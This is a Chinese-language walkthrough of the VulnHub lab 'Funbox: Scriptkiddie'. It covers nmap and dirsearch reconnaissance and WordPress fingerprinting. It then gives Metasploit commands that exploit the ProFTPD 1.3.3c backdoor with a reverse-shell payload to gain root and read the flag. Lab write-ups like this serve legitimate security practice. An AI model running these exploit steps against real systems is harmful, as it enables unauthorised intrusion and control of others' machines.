正如该靶场的描述所说,它对初学者来说非常简单。
项目地址:Funbox: Scriptkiddie ~ VulnHub
所需工具: KaliLinux即可。
打开虚拟机后使用nmap扫描一下网段存活,这里我给的虚拟机的范围是100-253,其中kali的IP是100,所以NAT模式下,靶机肯定在我扫描的这个范围。
由图可见,靶机的IP是192.168.2.126,接下来我们来扫描一下该主机的默认端口及服务版本。
nmap -sV 192.168.2.126 # 获取常用端口及其端口所对应的服务版本信息
有80端口的话,先扫一下目录~
dirsearch -u http://192.168.2.126
可以发现扫到了很多wp开头的路径,很显然这个网站是一个Wordpress框架,那么我们可以看看有没有相关文件可以看到Wordpress的版本信息
通过查看源代码,我们可以看到wordpress的版本号为6.3.2。
使用kali在漏洞库中搜索版本号相关信息,没有发现相关漏洞信息。后面通过wpscan扫描了一下也没有发现什么可以利用的东西,都是一些指纹信息。说明这道题的考点可能不在80端口。我们转换一下攻击方向看看其他端口有什么情况。
接下来,我们将目标转向21号端口,首先尝试一下匿名登录。
可以看到拒绝访问,应该是没有开匿名登录的功能,接下来在漏洞库搜下版本号。
searchpol
**我们可以看到有两条利用信息,其中第一条是远程代码执行,后面给了个绝对路径,是一个txt文件,里面是漏洞利用的源码;第二条是命令执行,可以直接通过Metasploit来利用,我们可以直接通过msf来利用,这里我们使用第二条
打开Metasploit并搜索相关漏洞信息。
- msfconsole
- msf6 > search ProFTPD 1.3.3c
可以看到,准确搜索,刚好就是我们想要利用的模块。直接进入该模块配置相关信息。
- msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.2.126
- rhosts => 192.168.2.126
- msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
- payload => cmd/unix/reverse
- msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost eth0
- lhost => eth0
- msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run
可以看到,等个大概一分钟,成功获取了靶机的控制权。
- ls /root
- cat /root/root.txt